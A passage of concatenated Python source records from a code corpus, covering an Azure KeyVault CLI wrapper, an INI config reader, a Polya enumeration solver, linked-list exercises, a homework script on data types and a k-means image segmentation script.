'getissuers', 'listissuers', 'setissuers',\n 'deleteissuers', 'manageissuers', 'recover', 'purge'\n ]\n\n sp.check_call(kv_add_principal_command, shell=self._sp_shell_flag, universal_newlines=True)\n except sp.CalledProcessError as e:\n\n self._logger.error('It was not possible to get add a service principal to KeyVault.')\n self._logger.error('The following error occurred: ' + str(e))\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)\n except ValueError as e:\n self._logger.error(e)\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)\n\n def create_kv_encryption_keys(\n self, \n key_name: str, \n kv_name: str):\n \"\"\"Function that creates encryption keys in KeyVault\n\n :param key_name: Encryption key name\n :type key_name: str\n :param kv_name: KeyVault name\n :type kv_name: str\n \n :return: Encryption Key ID\n :rtype: str\n :raises: :class:`Exception`\n \"\"\"\n\n try:\n\n self._logger.debug('Creating a new encryption key.')\n\n # Create encryption key.\n #-----------------------------------------------------------------------------\n \n create_key_command = [\n 'az',\n 'keyvault',\n 'key',\n 'create',\n '--name', key_name, \n '--protection', 'hsm',\n '--vault-name', kv_name,\n '--size', '2048'\n ]\n\n key_output = sp.check_output(create_key_command, shell=self._sp_shell_flag, universal_newlines=True)\n\n self._logger.debug('The create key command executed successfuly, producing the following output: {}'\n .format(key_output))\n\n # Convert the output to a json object.\n json_key_output = json.loads(key_output)\n\n # Check if the command returned a key definition.\n if len(json_key_output) <= 0:\n raise ValueError('The key output does not contain a key definition.')\n \n key_id = json_key_output['key']['kid']\n\n return key_id\n \n except sp.CalledProcessError as e:\n\n self._logger.error('It was not possible to create the {} key.'.format(key_name))\n self._logger.error('The following error occurred: ' + str(e))\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)\n except ValueError as e:\n \n self._logger.error(e)\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)","sub_path":"orchestration/integration/cli/keyvault_client.py","file_name":"keyvault_client.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"70438683","text":"import re\nfrom network_creators.gefx.nodes_edges_creator import NodesEdgesCreator\n\n\nclass AuthorUserUserComments(NodesEdgesCreator):\n\n def __init__(self, author):\n self.author = author\n\n def create(self, articles):\n #articles = filter(lambda a: a['author'] == self.author, articles)\n authors = []\n all_users = []\n for article in articles:\n authorName = article['author']\n author = self.__find_or_create_author(authors, authorName)\n users = self.__get_users_from_comments(article['comments'])\n for user in users:\n author.add_commentator(user)\n if user not in all_users:\n all_users.append(user)\n for comment in article['comments']:\n matches = re.match(\"^(@[^\\s]+)\", comment['content'])\n if matches is not None:\n nick = matches.group(0)[1:]\n if 'http://' not in nick:\n user_author = self.__find_or_create_author(authors, nick)\n user_author.add_commentator(comment['author'])\n nodes = self.__build_nodes(authors, all_users)\n return nodes, authors\n\n def __find_or_create_author(self, authors, authorName):\n found = filter(lambda a: a.name == authorName, authors)\n if len(found) > 0:\n author = found[0]\n else:\n author = Author(authorName)\n authors.append(author)\n return author\n\n def __get_users_from_comments(self, comments):\n users = []\n for comment in comments:\n user = comment['author']\n if user not in users:\n users.append(user)\n return users\n\n def __build_nodes(self, authors, all_users):\n nodes = []\n for author in authors:\n nodes.append(author)\n for user in all_users:\n nodes.append(user)\n return nodes\n\n\nclass Author:\n def __init__(self, name):\n self.name = name\n self.edges = {}\n\n def add_commentator(self, user):\n self.__assure_user_in_dict(user)\n self.edges[user] += 1\n\n def __assure_user_in_dict(self, user):\n if user not in self.edges:\n self.edges[user] = 0\n\n def __str__(self):\n return self.name\n","sub_path":"network_creators/author_user_user_comments.py","file_name":"author_user_user_comments.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"7550637","text":"from PublicMethod.OperateIniFile import OperateIni\n\nclass DataBaseInfoManager(OperateIni):\n '''读取配置文件中的db配置'''\n def __init__(self,SectionName,Filename='DataBaseInfo.ini'):\n super().__init__(Filename)\n self.SectionName=SectionName\n self.Data=self.get_section_data(SectionName)\n\n def get_value(self, Key):\n '''获取指定Key的Value'''\n for key,value in self.Data.items():\n if key==Key:\n return value\n\n def modify_database_name(self,Value,Key=\"databasename\"):\n '''修改配置中DataBaseName节点'''\n self.modify_section_data(self.SectionName,Value,Key)\n\nclass IniFileInfo():\n \"\"\"组织ini文件数据\"\"\"\n def __init__(self,*configfilenames):\n self.inisectiondata = []\n for configfilename in configfilenames:\n self.ini_all_section_data(configfilename)\n\n # def ini_all_section_data(self):\n # self.all_section_data=dict()\n # for section in self.section_namelist:\n # sectiondata=self.operationini.get_section_data(section)\n # for key,value in sectiondata.items():\n # valuelist=value.split(\",\")\n # sectiondata[key]=valuelist\n # self.all_section_data[section]=sectiondata\n\n def ini_all_section_data(self,filename):\n '''获取ini文件组装成数据'''\n # self.white_section_data = dict()\n # self.commontable_section_data = dict()\n section_data=dict()\n # for file in self.configfilenames:\n self.operationini=OperateIni(filename=filename,encoding=\"gbk\")\n self.section_namelist=self.operationini.section_name\n for section in self.section_namelist:\n sectiondata=self.operationini.get_section_data(section)\n for key,value in sectiondata.items():\n valuelist=value.split(\",\")\n sectiondata[key]=valuelist\n section_data[section]=sectiondata\n self.inisectiondata.append(section_data)\n # if filename==\"whiteList.ini\":\n # self.white_section_data[section]=sectiondata\n # elif filename==\"commTable.ini\":\n # self.commontable_section_data[section]=sectiondata\n\n # def get_key_value(self,keyname:str):\n # '''遍历所有节点,返回所有节点下指定key的值'''\n # keyvaluelist=[]\n # for section in self.section_namelist:\n # sectiondata=self.operationini.get_section_data(section)\n # for key,value in sectiondata.items():\n # if key==keyname:\n # keyvaluelist.append(value)\n # return keyvaluelist\n\n\nif __name__=='__main__':\n Info=DataBaseInfoManager(\"TargetDataBase\")\n # print(Info.get_value(\"databasename\"))\n # Info.modify_database_name(\"123\")\n w=IniFileInfo(\"whiteList.ini\", \"commTable.ini\")\n # print(w.white_section_data)\n # print(w.commontable_section_data)\n print(w.inisectiondata[0])\n print(w.inisectiondata[1])\n\n\n","sub_path":"DatabaseCommander/DataBaseUserInfo.py","file_name":"DataBaseUserInfo.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"328905748","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nAUTHORS: Conrad W. Rosenbrock, Wiley S. Morgan (October 2014)\n\nClasses to support the calculation of coefficients for specific terms in a product\nof multinomials. Construct a product class by specifying the exponent and target term\nand then add multinomials using the Product instance's append(). The coefficient is\nthen available from the coeff().\n\nEXAMPLE: find the coefficient of x^4.y^4.z^4 in 3*(x+y+z)^3*(x^2+y^2+z^2)^3*(x^3+y^3+z^3).\nANSWER: 162 from Mathematica\n\n>> p = Product(3, [4,4,4])\n>> p.append(Multinomial(1,3))\n>> p.append(Multinomial(2,3))\n>> p.append(Multinomial(3,1))\n>> print(p.coeff())\n162\n\"\"\"\nclass Sequence(object):\n \"\"\"Represents an exponent-limited sequence with a single root. Here, sequence represents a\n sequence of integer values k_1, k_2...k_j that are the exponents of a single term in a multinomial.\n The root of the sequence is one of the k_i; its children become sets of sequences including\n variables to the right of i.\n \"\"\"\n def __init__(self, root, possibles, i, powersum, targets, parent=None):\n \"\"\"Initializes a sequence collector for a variable. 'Term' refers to a product\n of variables like x^i.y^j.z^k, then x has index 0, y has 1, etc.\n\n :arg root: the exponent of the variable to the left in the multinomial term.\n :arg possibles: a list of possible values for each variable in the multinomial.\n :arg i: the index of the variable being sequenced in the term.\n :arg powersum: the maximum value that the sum of exponents in the sequence is allowed to have.\n :arg parent: a Sequence instance for the variable the *left* of this one\n (i.e. has index i-1).\n \"\"\"\n self._root = root\n self.used = root + (0 if parent is None else parent.used)\n self.parent = parent\n\n #We only keep recursively defining sequences until we run out of variables in\n #the term. Possibles is a list of possible exponents for each variable in the\n #term and has the same number of items as variables in the term.\n if i < len(targets):\n #Filter the possible values for the variable being considered based on the\n #exponent of the multinomial. When multinomials are expanded, the sum of\n #the exponents in any term must be less than the exponent on the multinomial\n #times the maximum power of any of its (unexpanded) terms.\n\n #We find all the possible values for this variable by ensuring that:\n # 1) it's exponent is compatible with the exponents of all variables to the left of it.\n # 2) the exponent we are suggesting is in the list of possible values for the variable.\n # 3) the exponent remains positive.\n self.kids = [Sequence(p-root, possibles, i+1, powersum, targets, self) \n for p in possibles if p-root >= 0\n and p-root <= targets[i]\n and abs(p - root) <= powersum-self.used \n and abs(p-self.used) % possibles[1] == 0]\n else:\n self.kids = []\n\n self._kidcount = None\n self.varcount = len(targets)\n\n @property\n def kidcount(self):\n \"\"\"Returns the number of children and grandchildren to the last generation.\"\"\"\n if self._kidcount is None:\n _kidcount = sum([k.kidcount for k in self.kids])\n if _kidcount == 0:\n _kidcount = len(self.kids)\n return _kidcount\n\n def expand(self, depth=0):\n \"\"\"Recursively generates a list of all relevant sequences for this multinomial term.\"\"\"\n #Iterate through the child sequences and add their variable root values if\n #the total sequence sums to the target.\n sequences = []\n for kid in self.kids:\n for seq in kid.expand(depth+1):\n #Here is where the recursion happens; we add the sequence of this variable's\n #children to the right of this root.\n sequences.append((self._root,) + seq)\n\n if len(self.kids) == 0:\n if depth == self.varcount-1:\n return [(self._root,)]\n else:\n return [(self._root,) + (0,)*(self.varcount-(depth+1))]\n else:\n return sequences\n\n def expand_noappend(self, sequences, start, varindex):\n \"\"\"Implements an expansion that doesn't use python's append.\"\"\"\n if len(sequences) == 0:\n if self.kidcount == 0:\n raise ValueError(\"This can't happen!\")\n sequences = [[0]*self.varcount for i in range(self.kidcount)]\n\n cursor = start\n for kid in self.kids:\n kid.expand_noappend(sequences, cursor, varindex+1)\n cursor += kid.kidcount\n\n if varindex == self.varcount-1:\n cursor += 1\n\n for k in range(start, cursor):\n sequences[k][varindex-1] = self._root\n start = cursor\n\n if self.kidcount == 0:\n sequences[cursor][varindex-1] = self._root\n \n return sequences\n\nclass Product(object):\n \"\"\"Represents a product of multinomials for which only a single term is interesting.\"\"\"\n def __init__(self, coefficient, targets):\n \"\"\"Initializes the empty product of multinomials.\n\n :arg coefficient: the scalar integer multiplying this product of multinomials.\n :arg targets: a list of exponents for the only interesting term in the product. The\n list is in the order that the variables appear in each multinomial.\n \"\"\"\n self.coefficient = coefficient\n self.targets = targets\n self.multinoms = []\n\n def coeff(self):\n \"\"\"Returns the coefficient of the term with the target exponents if all the multinomials\n in the product were expanded and had their terms collected.\n \"\"\"\n #If this is an isolated multinomial, we only need to check the coefficient of the target\n #term.\n if len(self.multinoms) == 1:\n if all([self.multinoms[0].power-t>0 for t in self.targets]):\n return 0\n else:\n return self.multinoms[0].nchoosekm(self.targets)*self.coefficient\n \n from itertools import product\n #Get a list of the possible exponents for each variable in each of the multinomials.\n #We start with the first variable and choose only those combinations of exponents\n #across *all* the multinomials that give the correct target exponent for that variable.\n possibles = [n.possible_powers for n in self.multinoms]\n seq0 = [s for s in product(*possibles) if sum(s) == self.targets[0]]\n\n #Next, we construct Sequence instances for each of the first variable compatible\n #possibilities and follow them through to the other variables.\n coeffs = 0\n for seq in seq0:\n mnseq = []\n #Each sequence calculated from the first variable has an entry for each multinomial\n #in this product. The Sequence instances construct smart sequences for the remaining\n #variables in each multinomial separately\n for i in range(len(seq)):\n varseq = Sequence(seq[i], possibles[i], 1, self.multinoms[i].powersum, self.targets)\n mnseq.append(varseq.expand())\n coeffs += self._sum_sequences(mnseq)\n\n return int(coeffs)*self.coefficient\n\n def _sum_sequences(self, mnseq):\n \"\"\"Sums all the possible combinations of relevant sequences based of the variable sequence\n lists specified.\n\n :arg mnseq: a list of possible variable sequences in each multinomial (one for each multinomial)\n that might contribute to the correct target variable.\n \"\"\"\n from itertools import product\n from operator import mul\n from functools import reduce\n #We can also filter the sequences by enforcing the constraints that the exponents\n #correctly reproduce the target across all the multionmials in the product. Get hold\n #of all the combinations of sequences across the multinomials and check each for\n #conformance to the targets.\n coeffs = 0\n for seq in product(*mnseq):\n expsum = [sum(zs) for zs in zip(*seq)]\n if expsum == self.targets:\n coeffs += reduce(mul, [m.nchoosekm(s) for m, s in zip(self.multinoms, seq)])\n\n return coeffs\n\n def __str__(self):\n #First we need to sort the multinomials by their exponent.\n sortedmns = sorted(self.multinoms, key=(lambda m: (m.exponent,m.power)), reverse=True)\n return str(self.coefficient) + ''.join([str(mn) for mn in sortedmns]) \n\nclass Multinomial(object):\n \"\"\"Represents a multinomial expansion.\"\"\"\n def __init__(self, power, exponent=1):\n \"\"\"Sets up the multinomial.\n\n :arg powers: the power on each of the *unexpanded* variables in the multinomial;\n of the form (x^2+y^2+z^2) => 2.\n :arg exponent: the exponent of the entire multinomial.\n \"\"\"\n self.power = power\n self.exponent = exponent\n self.powersum = power*exponent\n \"\"\"Returns the integer value that all term exponents in the multinomial should\n sum to (or be less than).\"\"\"\n self.possible_powers = list(range(0,power*exponent+1, power))\n \"\"\"For each variable being considered, determines the possible powers based\n on the exponent in the multinomial.\"\"\"\n\n def __str__(self):\n #We want to print the multinomial out in a nice, readable way, similar to how\n #they are presented in Mathematica.\n #contents = ' + '.join([\"{}\".format(p) for p in self.powers])\n return \"({})^{}\".format(self.power, self.exponent)\n\n def normed_seq(self, seq):\n \"\"\"Normalizes the specified sequence using the powers of unexpanded terms in the multinomial.\n \n :arg seq: a list of exponents in an *expanded* term.\n \"\"\"\n return [int(ai/self.power) for ai in seq]\n\n def nchoosekm(self, sequence):\n \"\"\"Returns the number of different ways to partition an n-element\n set into disjoint subsets of sizes k1, ..., km.\n\n :arg sequence: an un-normed tuple of form (k1, k2, k3).\n \"\"\"\n prod = 1\n if not all([seq%self.power == 0 for seq in sequence]):\n return 0\n else:\n normseq = self.normed_seq(sequence)\n for i in range(len(sequence)):\n nsum = sum(normseq[0:i+1])\n prod *= Multinomial.nchoosek(nsum, normseq[i])\n\n return prod\n \n @staticmethod\n def nchoosek(n, k):\n \"\"\"This implementation was taken from \"Binomial Coefficient Computation: Recursion \n or Iteration?\" by Yannis Manolopoulos, ACM SIGCSE Bulletin InRoads, Vol.34, No.4, \n December 2002. http://delab.csd.auth.gr/papers/SBI02m.pdf It is supposed to be robust \n against large, intermediate values and to have optimal complexity.\n \"\"\"\n if k < 0 or k > n:\n return 0\n if k==0 and n == 0:\n return 1\n t = 1\n if k < n-k:\n for i in range(n, n-k, -1):\n t = t*i/(n-i+1)\n else:\n for i in range(n, k, -1):\n t = t*i/(n-i+1)\n\n return t\n\ndef group(gen):\n \"\"\"Generates an entire group using the specified generators by applying generators\n to each other recursively.\n\n :arg gen: a list of generators as integers.\n \"\"\"\n from operator import itemgetter as iget\n def g_apply(operations, source, groupi=None):\n \"\"\"Applies the specified group operations to the source list of elements and then\n appends it to the group if it is unique.\n \"\"\"\n result = list(iget(*operations)(source))\n if groupi is not None and result not in groupi:\n groupi.append(result)\n return result\n\n #Make sure the group is zero-based for python.\n if not 0 in gen[0]:\n ngens = [list(map(lambda e: e-1, g)) for g in gen]\n else:\n ngens = gen\n\n groupi = []\n for i in ngens:\n for j in ngens: #filter(lambda k: k!=i, ngens):\n c = g_apply(i, j, groupi)\n d = g_apply(i, c, groupi)\n while d != c:\n d = g_apply(i, d, groupi)\n\n while True:\n group2 = []\n for i in ngens:\n for h in groupi:\n d = g_apply(i, h)\n if d not in groupi and d not in group2:\n group2.append(d)\n\n groupi.extend(group2)\n if len(group2) == 0:\n break\n return(groupi)\n\ndef _group_to_cyclic(group, limit=None):\n \"\"\"Determines the degeneracy of each r-cycle in the specified group operations.\"\"\"\n result = []\n #We allow filtering so that the unit testing can access the cyclic form of the group.\n if limit is not None:\n filtered = group[limit[0]:limit[1]]\n else:\n filtered = group\n\n for operation in filtered:\n #visited has the same # of elements as the group operation and is used to make sure each\n #element in the array is visited as we loop through in a *non-sequential* order.\n visited = [0]*len(operation)\n polynomials = {}\n\n while 0 in visited:\n #Start with the first element in the group that hasn't been visited yet. The first\n #non-trivial polynomials have powers > 0.\n cursor = vindex = visited.index(0)\n powers = 1 \n #change the current position to having been visited; move the cursor.\n visited[cursor] = 1\n cursor = operation[cursor]\n\n #The power of the variables in the polynomials is equal to the number of group operations\n #separating the cursor's current position from its *value* in the group operations list.\n while cursor != vindex:\n visited[cursor] = 1\n powers += 1\n cursor = operation[cursor]\n\n #We now have everything need to construct part of the polynomial. This is done by taking powers\n #and using it to construct an array of length equal to the number of elements in the system \n #each entry in the array is set to be equal to powers.\n if powers not in polynomials:\n polynomials[powers] = 1\n else:\n polynomials[powers] += 1\n\n result.append(polynomials)\n\n return result\n\ndef polya(concentrations, group, debug=False):\n \"\"\"Uses a group and concentrations to find the number of unique arrangements as described by \n polya.\n \n :arg concentrations: specify a list of integers specifying how many of each coloring should\n be present in each of the enumerated lists.\n :arg group: group operations for permuting the colorings.\n \"\"\"\n\n #This is to check that the concentrations sum to the number of sites the group is\n #operating on\n if sum(concentrations) != len(group[1]):\n print(\"The concentrations don't sum to the number of things the group is acting on!\")\n exit()\n\n if 0 not in group[0]:\n group = [[j -1 for j in i] for i in group]\n \n polyndict = {}\n #The operations in the group are used to construct the unique polynomials for each operation.\n for polynomials in _group_to_cyclic(group):\n #Construct a product of multinomials for this group operation.\n p = Product(1,concentrations)\n for exp in polynomials:\n p.multinoms.append(Multinomial(exp, polynomials[exp]))\n\n key = str(p)\n if key not in polyndict:\n polyndict[key] = p\n else:\n polyndict[key].coefficient += 1\n\n if debug:\n for key in polyndict:\n print(str(polyndict[key]), \" => \", polyndict[key].coeff())\n\n rad = sum([p.coeff() for p in polyndict.values()])\n return int(rad/float(len(group))) \n\ndef _examples():\n \"\"\"Print some examples on how to use this python version of the code.\"\"\"\n helptext = (\"For all the examples below, it is assumed that you know the fixed concentration \"\n \"term T in advance. This term is the first, *positional* argument to the script. \"\n \"In addition to the term T, you need to specify the group operations as permutation \"\n \"lists. They can be either zero- or one-based. Group operations can be specified \"\n \"with the group generators or as a 2D matrix with all the group operations; if the \"\n \"lists of values were saved directly from python using a __repr__ or __str__ then \"\n \"use the '-parse' argument to specify that.\")\n egs = [(\"Find the Polya Coefficient with Group Generators\",\n \"The code below finds the number of unique ways to color a square with 4 corners using \"\n \"2 different colors such that there are 2 corners with each color. \"\n \"The group is specified using generators in a file called 'generators.in.paper'. The \"\n \"contents of the generators file are:\\n 4 3 2 1\\n 2 3 4 1\\nand are the generators \"\n \"for the dihedral group of degree 4.\", \"./polya.py 2 2 -generators generators.in.paper\"),\n (\"Find the Polya Coefficient with an Entire Group\",\n \"This code also finds the coefficient, but for a larger group with 144 operations acting \"\n \"on a finite set with 20 elements. The term T is specified as [4,4,4,2,2,2,2] so that we \"\n \"want 4 of the first 3 colors and 2 of the last 4 colors with 7, the total number of \"\n \"colors in the enumeration. The group file 'group.out.cr6' can be viewed in the repo at \"\n \"'polya/fortran/tests/'.\", \"./polya.py 4 4 4 2 2 2 2 -group group.out.cr6\")]\n\n print(\"POLYA ENUMERATION THEOREM SOLVER\\n\")\n for eg in egs:\n title, desc, code = eg\n print(\"--\" + title + '--\\n')\n print(desc + '\\n')\n print(' ' + code + '\\n')\n\ndef _parser_options(phelp=False):\n \"\"\"Parses the options and arguments from the command line.\"\"\"\n import argparse\n parser = argparse.ArgumentParser(description=\"Polya Coefficient Calculator\")\n parser.add_argument(\"-generators\",\n help=(\"Specify the name/path to a file that lists the generators for \"\n \"the symmetry group defining uniqueness on the lattice.\"))\n parser.add_argument(\"-group\",\n help=(\"Specify the name/path to a file listing the *entire* set of group \"\n \"symmetry operations defining uniqueness on the lattice.\"))\n parser.add_argument(\"-parse\", choices=[\"python\", \"text\"], default=\"text\",\n help=(\"Choose how the group files will be interpreted by the script:\\n\"\n \"- 'python': the text is assumed to be a valid python expression, \\n\"\n \"\\tsuch as a list, and is interpreted using eval(). \\n\"\n \"- 'text': text values are split on whitespace and converted to \\n\"\n \"\\tintegers. One group operation/generator per line.\"))\n parser.add_argument(\"concentrations\", type=int, nargs=\"*\", default=[0],\n help=(\"The number of each type of coloring in the concentration restricted \"\n \"enumeration on a lattice.\"))\n parser.add_argument(\"-debug\", action=\"store_true\",\n help=\"Print verbose polya polynomial information for debugging.\")\n parser.add_argument(\"-examples\", action=\"store_true\",\n help=\"Print some examples for how to use the Polya solver.\")\n\n vardict = vars(parser.parse_args())\n if phelp or vardict[\"examples\"]:\n _examples()\n exit(0)\n return vardict\n\ndef _read_file(args, filepath):\n \"\"\"Parses the contents of the specified file using the 'parse' arguments from script args.\"\"\"\n from os import path\n contents = []\n with open(path.expanduser(filepath)) as f:\n if args[\"parse\"] == \"text\":\n for line in f:\n contents.append(map(int, line.split()))\n else:\n contents = eval(f.read())\n\n return contents\n\ndef script_polya(args):\n \"\"\"Calculates the number of unique ways to enumerate a fixed set of colorings on a lattice\n subject to a set of symmetry operations.\n \"\"\"\n if not args[\"generators\"] and not args[\"group\"]:\n _parser_options(True)\n\n if args[\"generators\"]:\n gens = _read_file(args, args[\"generators\"])\n grpops = group(gens)\n elif args[\"group\"]:\n grpops = _read_file(args, args[\"group\"])\n\n coeff = polya(args[\"concentrations\"], grpops, args[\"debug\"])\n print(coeff)\n return coeff\n\nif __name__ == '__main__':\n script_polya(_parser_options())\n","sub_path":"python/polya.py","file_name":"polya.py","file_ext":"py","file_size_in_byte":20984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"402792579","text":"#!/usr/bin/python\n\n# Usage:\n# 1. Place this script to /Library/Application Support/BBEdit/Text Filters\n# 2. Restart BBEdit, and Text -> Apply Text Filter -> prettyJSON\n#\n# References: http://www.kyleclegg.com/blog/tidy-json-formatting-with-textwrangler\n\nimport fileinput\nimport json\n\nif __name__ == '__main__':\n jsonStr = ''\n for aline in fileinput.input():\n jsonStr = jsonStr + ' ' + aline.strip()\n jsonObj = json.loads(jsonStr)\n print(json.dumps(jsonObj, ensure_ascii=False, sort_keys=True, indent=2).encode('utf8'))\n","sub_path":"python_tool/BBEdit scripts/prettyJSON.py","file_name":"prettyJSON.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"443130959","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\"\"\"\n\n\nclass ListNode:\n def __init__(self, x=None):\n self.val = x\n self.next = None\n\n\ndef add_two_numbers(l1, l2):\n if not l1 or not l2:\n return l1 or l2\n tmp = 0\n pnode = phead = ListNode(-1)\n while l1 or l2 or tmp:\n if l1:\n tmp += l1.val\n l1 = l1.next\n if l2:\n tmp += l2.val\n l2 = l2.next\n pnode.next = ListNode(tmp % 10)\n pnode = pnode.next\n tmp //= 10\n return phead.next\n\n\ndef merge_two_lists(l1, l2):\n if not l1 or not l2:\n return l1 or l2\n\n pnode = phead = ListNode(-1)\n while l1 and l2:\n if l1.val < l2.val:\n pnode.next = l1\n l1 = l1.next\n else:\n pnode.next = l2\n l2 = l2.next\n pnode = pnode.next\n pnode.next = l1 or l2\n\n return phead.next\n\n\ndef merge_k_lists(lists):\n if not lists:\n return\n\n if len(lists) == 1:\n return lists[0]\n\n if len(lists) == 2:\n return merge_two_lists(lists[0], lists[1])\n\n mid = len(lists) // 2\n left = lists[:mid]\n right = lists[mid:]\n\n left_head = merge_k_lists(left)\n right_head = merge_k_lists(right)\n\n return merge_two_lists(left_head, right_head)\n\n\ndef swap_pairs(head: ListNode) -> ListNode:\n if not head:\n return head\n\n\n\n\n\n","sub_path":"src/leetcode/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"303423839","text":"'''\nЗадача #1\nСоздать список и заполнить его элементами различных типов данных. Реализовать скрипт\nпроверки типа данных каждого элемента. Использовать функцию type() для проверки типа.\nЭлементы списка можно не запрашивать у пользователя, а указать явно, в программе.\n'''\n\nmy_list = [10, 29878546547780, 25.33, 'Строка', None, [12, None, 'abc'], False, complex(5, 6), b'text', (1, 'cde', None), {'1' : 'a', '2' : 'b'}, set([15, False, 'xyz']), bytearray(b'some text')]\nprint('Созданный список:', my_list, end = '\\n\\n')\n\n'''\n# Объединятются в кортежи элементы 3-х списков\n# 1) Список человеческих названий типов. Вытащенный из словаря my_list_type_names для элементов списка my_list\n# 2) Просто список описаний типов для элементов списка my_list\n# 3) Сами элементы списка my_list\n# А затем это все печатается с помощью функции list(map(....\n'''\n\nmy_list_type_names = {None : \"пустое значение\", str : \"строка\", int : \"целое число\",\n float : \"число с плавающей точкой\", complex : \"комплексное число\",\n bool : \"булевая переменная\", bytes : \"битовое значение\",\n list : \"список\", set : \"множество\", tuple : \"кортеж\", dict : \"словарь\"}\n\nlist(map(print, list(zip(list(map(lambda x: (my_list_type_names.get((type(x), None)[x is None]), 'ерунда какя-то')[my_list_type_names.get((type(x), None)[x is None]) is None], my_list)), list(map(type, my_list)), my_list))))\n\n'''\nПонимаю, что выглядит нечитаемо, но, на мой взгляд (хотя я могу ошибаться) это как раз решение в духе стиля Python \nдля тех, ктопока не знает, что такое - функция.\n\nЧтобы было понятно, что я разобрался с заданием, вот еще один пример решения:\n\n# Первый вариант.\nlist(map(print, list(zip(list(map(type, my_list)), my_list))))\n\nили вот\n\n# Второй вариант. Со вставками человеческого языка.\ncount = 0\nfor el in my_list:\n type_custom_name = 'ерунда какя-то'\n if el is None:\n type_custom_name = \"пустое значение\"\n elif type(el) is str:\n type_custom_name = \"строка\"\n elif type(el) is int:\n type_custom_name = \"целое число\"\n elif type(el) is float:\n type_custom_name = \"число с плавающей точкой\"\n elif type(el) is complex:\n type_custom_name = \"комплексное число\"\n elif type(el) is bool:\n type_custom_name = \"булевая переменная\"\n elif type(el) is bytes:\n type_custom_name = \"битовое значение\"\n elif type(el) is list:\n type_custom_name = \"список\"\n elif type(el) is set:\n type_custom_name = \"множество\"\n elif type(el) is tuple:\n type_custom_name = \"кортеж\"\n elif type(el) is dict:\n type_custom_name = \"словарь\"\n\n print(f'{count}) {type_custom_name}: {el}')\n count += 1\n'''","sub_path":"I четверть/Основы языка Python (Вебинар)/Lesson-2/hw_2_1.py","file_name":"hw_2_1.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"331182199","text":"\"\"\"\n-*- coding: utf-8 -*-\n@author: Kuang Hao\n\"\"\"\nimport numpy as np\nimport cv2 # opencv: https://pypi.python.org/pypi/opencv-python\nfrom scipy.stats import multivariate_normal\n\ndef read_data(filename, is_RGB, visualize=False, save=False, save_name=None):\n# read the text data file\n# data, image = read_data(filename, is_RGB) read the data file named \n# filename. Return the data matrix with same shape as data in the file. \n# If is_RGB is False, the data will be regarded as Lab and convert to \n# RGB format to visualise and save.\n#\n# data, image = read_data(filename, is_RGB, visualize) \n# If visualize is True, the data will be shown. Default value is False.\n#\n# data, image = read_data(filename, is_RGB, visualize, save) \n# If save is True, the image will be saved in an jpg image with same name\n# as the text filename. Default value is False.\n#\n# data, image = read_data(filename, is_RGB, visualize, save, save_name) \n# The image filename.\n#\n# Example: data, image = read_data(\"1_noise.txt\", True)\n# Example: data, image = read_data(\"cow.txt\", False, True, True, \"segmented_cow.jpg\")\n\n with open(filename, \"r\") as f:\n lines = f.readlines()\n\n data = []\n\n for line in lines:\n data.append(list(map(float, line.split(\" \"))))\n\n data = np.asarray(data).astype(np.float32)\n\n N, D = data.shape\n\n cols = int(data[-1, 0] + 1)\n rows = int(data[-1, 1] + 1)\n channels = D - 2\n img_data = data[:, 2:]\n\n # In numpy, transforming 1d array to 2d is in row-major order, which is different from the way image data is organized.\n image = np.reshape(img_data, [cols, rows, channels]).transpose((1, 0, 2))\n\n if visualize:\n if channels == 1:\n # for visualizing grayscale image\n cv2.imshow(\"\", image)\n else:\n # for visualizing RGB image\n cv2.imshow(\"\", cv2.cvtColor(image, cv2.COLOR_Lab2BGR))\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n if save:\n if save_name is None:\n save_name = filename[:-4] + \".jpg\"\n assert save_name.endswith(\".jpg\") or save_name.endswith(\".png\"), \"Please specify the file type in suffix in 'save_name'!\"\n\n if channels == 1:\n # for saving grayscale image\n cv2.imwrite(save_name, image)\n else:\n # for saving RGB image\n cv2.imwrite(save_name, (cv2.cvtColor(image, cv2.COLOR_Lab2BGR) * 255).astype(np.uint8))\n\n if not is_RGB:\n image = cv2.cvtColor(image, cv2.COLOR_Lab2RGB)\n\n return data, image\n\ndef write_data(data, filename):\n# write the matrix into a text file\n# write_data(data, filename) write 2d matrix data into a text file named\n# filename.\n#\n# Example: write_data(data, \"cow.txt\")\n\n lines = []\n for i in range(len(data)):\n lines.append(\" \".join([str(int(data[i, 0])), str(int(data[i, 1]))] + [\"%.6f\" % v for v in data[i, 2:]]) + \"\\n\")\n\n with open(filename, \"w\") as f:\n f.writelines(lines)\n\ndef Kmeans(obs_data,cluster,epsilon):\n # returns matrix r: expressing which observed data point belongs to which cluster\n #vectors cluster: mean vector of each cluster\n N = len(obs_data)\n K = len(cluster)\n tmp = np.ones(cluster.shape)\n\n def Astep(obs_data,cluster):\n #Assignment step\n r = np.zeros((N,K))\n min_ix = np.argmin(np.array([[np.linalg.norm(x-mu) for mu in cluster] for x in obs_data]),axis = 1)\n r[np.arange(N),min_ix] = 1\n return r\n\n def Ustep(obs_data,r):\n #Update step\n Nk= np.sum(r,axis=0)\n Nk[Nk==0]=1\n cluster = np.array([np.sum([r[n, k] * obs_data[n] for n in range(N)], axis=0) / Nk[k] for k in range(K)])\n return 